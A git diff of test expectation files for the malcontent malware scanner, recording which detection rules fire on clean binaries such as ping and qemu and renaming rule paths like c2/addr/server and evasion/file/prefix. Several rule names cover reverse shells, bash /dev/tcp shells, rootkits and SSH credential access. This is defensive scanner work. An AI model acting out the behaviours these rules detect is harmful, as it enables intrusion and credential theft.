a/tests/linux/clean/ping.x86_64.md b/tests/linux/clean/ping.x86_64.md index 9a3b9ab45..c5f8863cc 100644 --- a/tests/linux/clean/ping.x86_64.md +++ b/tests/linux/clean/ping.x86_64.md 
@@ -3,14 +3,14 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--------|--------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[Port](https://github.com/search?q=Port&type=code) | +| MEDIUM | [discover/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/multiple.yara#sys_net_recon) | collects system and network information | [id](https://github.com/search?q=id&type=code)
[ipv4=addr](https://github.com/search?q=ipv4%3Daddr&type=code)
[ipv6=addr](https://github.com/search?q=ipv6%3Daddr&type=code) | | MEDIUM | [discover/network/interface_list](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-list.yara#bsd_ifaddrs) | list network interfaces | [freeifaddrs](https://github.com/search?q=freeifaddrs&type=code)
[getifaddrs](https://github.com/search?q=getifaddrs&type=code) | -| MEDIUM | [discover/system/network](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/system_network.yara#sys_net_recon) | collects system and network information | [id](https://github.com/search?q=id&type=code)
[ipv4=addr](https://github.com/search?q=ipv4%3Daddr&type=code)
[ipv6=addr](https://github.com/search?q=ipv6%3Daddr&type=code) | | MEDIUM | [net/ip/addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/addr.yara#ip_addr) | mentions an 'IP address' | [IP address](https://github.com/search?q=IP+address&type=code) | | MEDIUM | [net/ip/icmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/icmp.yara#ping) | Uses the ping tool to generate ICMP packets | [ping -6 -N](https://github.com/search?q=ping+-6+-N&type=code)
[ping broadcast](https://github.com/search?q=ping+broadcast&type=code)
[ping does not fragment](https://github.com/search?q=ping+does+not+fragment&type=code)
[ping for user must be](https://github.com/search?q=ping+for+user+must+be&type=code)
[ping session](https://github.com/search?q=ping+session&type=code)
[ping statistics ---](https://github.com/search?q=ping+statistics+---&type=code) | | MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-parse.yara#inet_pton) | parses IP address (IPv4 or IPv6) | [inet_pton](https://github.com/search?q=inet_pton&type=code) | | MEDIUM | [net/ip/string](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-string.yara#inet_ntoa) | [converts IP address from byte to string](https://linux.die.net/man/3/inet_ntoa) | [inet_ntoa](https://github.com/search?q=inet_ntoa&type=code)
[inet_ntop](https://github.com/search?q=inet_ntop&type=code) | | MEDIUM | [net/socket/raw](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/raw.yara#raw_sockets) | [send raw and/or malformed IP packets](https://man7.org/linux/man-pages/man7/raw.7.html) | [SOCK_RAW](https://github.com/search?q=SOCK_RAW&type=code)
[raw socket](https://github.com/search?q=raw+socket&type=code) | -| LOW | [discover/network/interface_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-get.yara#bsd_if) | get network interfaces by name or index | [if_nametoindex](https://github.com/search?q=if_nametoindex&type=code) | +| LOW | [discover/network/interface](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface.yara#bsd_if) | get network interfaces by name or index | [if_nametoindex](https://github.com/search?q=if_nametoindex&type=code) | | LOW | [net/ip/multicast_send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-multicast-send.yara#multicast) | [send data to multiple nodes simultaneously](https://en.wikipedia.org/wiki/IP_multicast) | [multicast](https://github.com/search?q=multicast&type=code) | | LOW | [net/ip/send_unicast](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-send-unicast.yara#unicast) | send data to the internet | [unicast](https://github.com/search?q=unicast&type=code) | | LOW | [net/resolve/hostport_parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostport-parse.yara#getaddrinfo) | Network address and service translation | [freeaddrinfo](https://github.com/search?q=freeaddrinfo&type=code)
[getaddrinfo](https://github.com/search?q=getaddrinfo&type=code) |
diff --git a/tests/linux/clean/pulumi.simple b/tests/linux/clean/pulumi.simple
index 26472bd5f..287705b9f 100644
--- a/tests/linux/clean/pulumi.simple
+++ b/tests/linux/clean/pulumi.simple
@@ -3,7 +3,7 @@
 3P/threat_hunting/sharppack: medium
 c2/addr/http_dynamic: medium
 c2/addr/ip: medium
-c2/server_address: medium
+c2/addr/server: medium
 c2/tool_transfer/download: medium
 collect/archives/zip: medium
 collect/databases/mysql: medium
@@ -38,15 +38,16 @@ discover/cloud/google_metadata: low
 discover/cloud/google_storage: low
 discover/group/lookup: medium
 discover/network/mac_address: medium
+discover/process/parent: low
 discover/processes/list: medium
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/system/cpu: low
+discover/system/hostname: low
 discover/system/platform: medium
 discover/system/sysinfo: medium
 discover/user/HOME: low
 discover/user/USER: low
 discover/user/name_get: medium
-evasion/hidden_paths/hidden: medium
+evasion/file/prefix: medium
 exec/cmd: medium
 exec/conditional/LANG: low
 exec/install_additional/pip_install: medium
@@ -141,7 +142,6 @@ persist/kernel_module/module: medium
 persist/pid_file: medium
 privesc/sudo: medium
 process/chroot: low
-process/parent_pid_get: low
 sus/exclamation: medium
 sus/intercept: medium
 sus/leetspeak: medium
diff --git a/tests/linux/clean/pypi_package_index.json.simple b/tests/linux/clean/pypi_package_index.json.simple
index 00f118f0f..cb5c63bb8 100644
--- a/tests/linux/clean/pypi_package_index.json.simple
+++ b/tests/linux/clean/pypi_package_index.json.simple
@@ -101,7 +101,7 @@ discover/network/interface_list: medium
 discover/network/netstat: medium
 discover/processes/list: medium
 discover/processes/pgrep: medium
-discover/system/cpu_info: low
+discover/system/cpu: low
 discover/system/machine_id: low
 discover/system/platform: low
 discover/system/sysinfo: medium
@@ -111,6 +111,7 @@ evasion/bypass_security/linux/ufw: medium
 evasion/logging/acct: low
 evasion/process_injection/ptrace: medium
 evasion/process_injection/readelf: medium
+evasion/rootkit/refs: medium
 exec/dylib/symbol_address: medium
 exec/install_additional/pip_install: high
 exec/plugin: low
@@ -152,7 +153,6 @@ impact/remote_access/net_shell: high
 impact/remote_access/reverse_shell: high
 impact/remote_access/trojan: medium
 impact/rootkit: low
-impact/rootkit/refs: medium
 impact/ui/screen_capture: high
 impact/ui/x11_auth: medium
 lateral/scan/brute_force: low
diff --git a/tests/linux/clean/qemu-system-xtensa.md b/tests/linux/clean/qemu-system-xtensa.md
index f7d0f95b6..94ebbe1ec 100644
--- a/tests/linux/clean/qemu-system-xtensa.md
+++ b/tests/linux/clean/qemu-system-xtensa.md
@@ -4,13 +4,13 @@ |--------|--------------------------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------| | HIGH | [crypto/xor](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/xor.yara#xor_decode_encode) | decodes/encodes XOR content | [Opcode_xor_encode_fns](https://github.com/search?q=Opcode_xor_encode_fns&type=code) | | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[Ip](https://github.com/search?q=Ip&type=code)
[Port](https://github.com/search?q=Port&type=code)
[add_port](https://github.com/search?q=add_port&type=code)
[ahci_port](https://github.com/search?q=ahci_port&type=code)
[and_port](https://github.com/search?q=and_port&type=code)
[be_port](https://github.com/search?q=be_port&type=code)
[claim_port](https://github.com/search?q=claim_port&type=code)
[clear_port](https://github.com/search?q=clear_port&type=code)
[compare_ip](https://github.com/search?q=compare_ip&type=code)
[ehci_port](https://github.com/search?q=ehci_port&type=code)
[extract_ip](https://github.com/search?q=extract_ip&type=code)
[find_port](https://github.com/search?q=find_port&type=code)
[fix_port](https://github.com/search?q=fix_port&type=code)
[get_ip](https://github.com/search?q=get_ip&type=code)
[get_port](https://github.com/search?q=get_port&type=code)
[handle_port](https://github.com/search?q=handle_port&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[hub_port](https://github.com/search?q=hub_port&type=code)
[megasas_port](https://github.com/search?q=megasas_port&type=code)
[mem_port](https://github.com/search?q=mem_port&type=code)
[message_port](https://github.com/search?q=message_port&type=code)
[metadata_ip](https://github.com/search?q=metadata_ip&type=code)
[mmio_port](https://github.com/search?q=mmio_port&type=code)
[mptsas_port](https://github.com/search?q=mptsas_port&type=code)
[ohci_port](https://github.com/search?q=ohci_port&type=code)
[pcie_port](https://github.com/search?q=pcie_port&type=code)
[register_port](https://github.com/search?q=register_port&type=code)
[release_port](https://github.com/search?q=release_port&type=code)
[remove_port](https://github.com/search?q=remove_port&type=code)
[reset_port](https://github.com/search?q=reset_port&type=code)
[serial_port](https://github.com/search?q=serial_port&type=code)
[spdm_port](https://github.com/search?q=spdm_port&type=code)
[state_port](https://github.com/search?q=state_port&type=code)
[throttle_port](https://github.com/search?q=throttle_port&type=code)
[uhci_port](https://github.com/search?q=uhci_port&type=code)
[update_ip](https://github.com/search?q=update_ip&type=code)
[upstream_port](https://github.com/search?q=upstream_port&type=code)
[usb_port](https://github.com/search?q=usb_port&type=code)
[virtser_port](https://github.com/search?q=virtser_port&type=code)
[write_port](https://github.com/search?q=write_port&type=code)
[xhci_port](https://github.com/search?q=xhci_port&type=code) | +| MEDIUM | [c2/addr/server](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/server.yara#server_address) | references a 'server address', possible C2 client | [vnc_init_basic_info_from_server_addr](https://github.com/search?q=vnc_init_basic_info_from_server_addr&type=code) | | MEDIUM | [c2/refs](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/refs.yara#command_and_control) | Uses terms that may reference a command and control server | [c2_port](https://github.com/search?q=c2_port&type=code) | -| MEDIUM | [c2/server_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/server_address.yara#server_address) | references a 'server address', possible C2 client | [vnc_init_basic_info_from_server_addr](https://github.com/search?q=vnc_init_basic_info_from_server_addr&type=code) | | MEDIUM | [collect/databases/sqlite](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/sqlite.yara#sqlite) | accesses SQLite databases | [sqlite](https://github.com/search?q=sqlite&type=code) | -| MEDIUM | [credential/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssh/ssh.yara#ssh_folder) | [accesses SSH configuration and/or keys](https://www.sentinelone.com/blog/macos-malware-2023-a-deep-dive-into-emerging-trends-and-evolving-techniques/) | [/.ssh/config](https://github.com/search?q=%2F.ssh%2Fconfig&type=code) | +| MEDIUM | [credential/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssh/ssh.yara#ssh_folder) | [accesses SSH configuration and/or keys](https://www.sentinelone.com/blog/macos-malware-2023-a-deep-dive-into-emerging-trends-and-evolving-techniques/) | [~/.ssh/config](https://github.com/search?q=~%2F.ssh%2Fconfig&type=code) | | MEDIUM | [data/base64/decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-decode.yara#py_base64_decode) | decode base64 
strings | [base64_decode](https://github.com/search?q=base64_decode&type=code) | | MEDIUM | [discover/network/mac_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/mac-address.yara#macaddr) | Retrieves network MAC address | [MAC address](https://github.com/search?q=MAC+address&type=code) | -| MEDIUM | [evasion/hidden_paths/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/hidden.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | +| MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | | MEDIUM | [evasion/indicator_blocking/vm](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/indicator_blocking/vm.yara#hidden_qemu) | operates a QEMU VM | [QEMU_VFIO](https://github.com/search?q=QEMU_VFIO&type=code)
[unable to find CPU model '%s'](https://github.com/search?q=unable+to+find+CPU+model+%27%25s%27&type=code) | | MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [qapi_free_MigrationExecCommand](https://github.com/search?q=qapi_free_MigrationExecCommand&type=code)
[visit_type_MigrationExecCommand_members](https://github.com/search?q=visit_type_MigrationExecCommand_members&type=code) | | MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execall) | executes external programs | [execv](https://github.com/search?q=execv&type=code) | @@ -29,7 +29,7 @@ | MEDIUM | [impact/remote_access/agent](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/agent.yara#agent) | references an 'agent' | [vdagent](https://github.com/search?q=vdagent&type=code) | | MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [06zu:qmp_enter_x_colo_lost_heartbeat](https://github.com/search?q=06zu%3Aqmp_enter_x_colo_lost_heartbeat&type=code)
[06zu:qmp_exit_x_colo_lost_heartbeat](https://github.com/search?q=06zu%3Aqmp_exit_x_colo_lost_heartbeat&type=code)
[Tell COLO that heartbeat is lost](https://github.com/search?q=Tell+COLO+that+heartbeat+is+lost&type=code)
[hmp_x_colo_lost_heartbeat](https://github.com/search?q=hmp_x_colo_lost_heartbeat&type=code)
[qmp_marshal_x_colo_lost_heartbeat](https://github.com/search?q=qmp_marshal_x_colo_lost_heartbeat&type=code)
[qmp_x_colo_lost_heartbeat](https://github.com/search?q=qmp_x_colo_lost_heartbeat&type=code) | | MEDIUM | [impact/remote_access/net_exec](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/net_exec.yara#exec_chdir_and_socket) | exec chdir and socket | [chdir](https://github.com/search?q=chdir&type=code)
[execve](https://github.com/search?q=execve&type=code)
[socket](https://github.com/search?q=socket&type=code) | -| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [Probe](https://github.com/search?q=Probe&type=code)
[connect](https://github.com/search?q=connect&type=code)
[gethostbyname](https://github.com/search?q=gethostbyname&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | +| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [Port](https://github.com/search?q=Port&type=code)
[Probe](https://github.com/search?q=Probe&type=code)
[Target](https://github.com/search?q=Target&type=code)
[connect](https://github.com/search?q=connect&type=code)
[gethostbyname](https://github.com/search?q=gethostbyname&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | | MEDIUM | [mem/anonymous_file](https://github.com/chainguard-dev/malcontent/blob/main/rules/mem/anonymous-file.yara#memfd_create) | create an anonymous file | [memfd_create](https://github.com/search?q=memfd_create&type=code) | | MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | | MEDIUM | [net/http/websocket](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/websocket.yara#websocket) | [supports web sockets](https://www.rfc-editor.org/rfc/rfc6455) | [258EAFA5-E914-47DA-95CA-C5AB0DC85B11](https://github.com/search?q=258EAFA5-E914-47DA-95CA-C5AB0DC85B11&type=code)
[WebSocket](https://github.com/search?q=WebSocket&type=code) | @@ -58,6 +58,8 @@ | LOW | [data/encoding/base64](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/base64.yara#b64) | Supports base64 encoded strings | [base64](https://github.com/search?q=base64&type=code) | | LOW | [data/hash/md5](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/md5.yara#MD5) | Uses the MD5 signature format | [md5:](https://github.com/search?q=md5%3A&type=code) | | LOW | [data/hash/sha256](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha256.yara#SHA256) | Uses the SHA256 signature format | [SHA256_](https://github.com/search?q=SHA256_&type=code) | +| LOW | [discover/process/parent](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | +| LOW | [discover/system/dmesg](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/dmesg.yara#dmesg) | accesses the kernel log ring buffer | [dmesg](https://github.com/search?q=dmesg&type=code) | | LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) | | LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | | LOW | [evasion/logging/acct](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/logging/acct.yara#acct) | switch process accounting on or off | [acct](https://github.com/search?q=acct&type=code) | @@ -92,7 +94,6 @@ | LOW | [process/groupid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groupid-set.yara#setgid) | set real and effective group ID of process | [setgid](https://github.com/search?q=setgid&type=code) | | LOW | [process/groups_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups) | set group access list | [setgroups](https://github.com/search?q=setgroups&type=code) | | LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | -| LOW | [process/parent_pid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/parent_pid-get.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | | LOW | [process/unshare](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/unshare.yara#syscall_unshare) | disassociate parts of the process execution context | [unshare](https://github.com/search?q=unshare&type=code) | | LOW | [process/userid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) | diff --git a/tests/linux/clean/rules.json.simple b/tests/linux/clean/rules.json.simple index a941c2be7..6e31704e3 100644 --- a/tests/linux/clean/rules.json.simple +++ b/tests/linux/clean/rules.json.simple 
@@ -21,17 +21,17 @@ data/compression/bzip2: low data/compression/lzma: low data/compression/zstd: low data/encoding/base64: low -discover/system/network: high +discover/multiple: medium +discover/system/dmesg: low discover/system/platform: low discover/user/name_get: medium evasion/bypass_security/linux/iptables: medium evasion/bypass_security/linux/ufw: medium -evasion/hidden_paths/hidden: medium -evasion/hidden_paths/var_run: medium +evasion/file/location/var_run: medium +evasion/file/prefix: medium evasion/logging/acct: low evasion/process_injection/readelf: medium exec/plugin: low -exec/shell/bash_dev_tcp: high exec/shell/bash_dev_udp: medium exec/shell/nohup: medium exec/system_controls/apparmor: medium @@ -57,6 +57,7 @@ impact/exploit/cve: medium impact/remote_access/iptables: medium net/dns/servers: low net/download: medium +net/ftp/t: low net/http/cookies: medium net/socket/connect: medium net/tcp/sftp: medium diff --git a/tests/linux/clean/searchindex.json.simple b/tests/linux/clean/searchindex.json.simple index 37d595af0..61d126494 100644 --- a/tests/linux/clean/searchindex.json.simple +++ b/tests/linux/clean/searchindex.json.simple @@ -1,4 +1,4 @@ -# linux/clean/searchindex.json: high +# linux/clean/searchindex.json: medium 3P/threat_hunting/dd: medium 3P/threat_hunting/keylogger: medium anti-static/obfuscation/obfuscate: low @@ -12,8 +12,9 @@ data/random/insecure: low discover/components/docker: medium discover/system/platform: low discover/system/sysinfo: medium -evasion/covert_location/chdir_unusual: medium -evasion/hide_artifacts/system_directories: medium +evasion/file/location/chdir_unusual: medium +evasion/file/location/system_directory: medium +evasion/rootkit/refs: medium exec/install_additional/package_install: medium exec/install_additional/pip_install: medium exec/plugin: low 
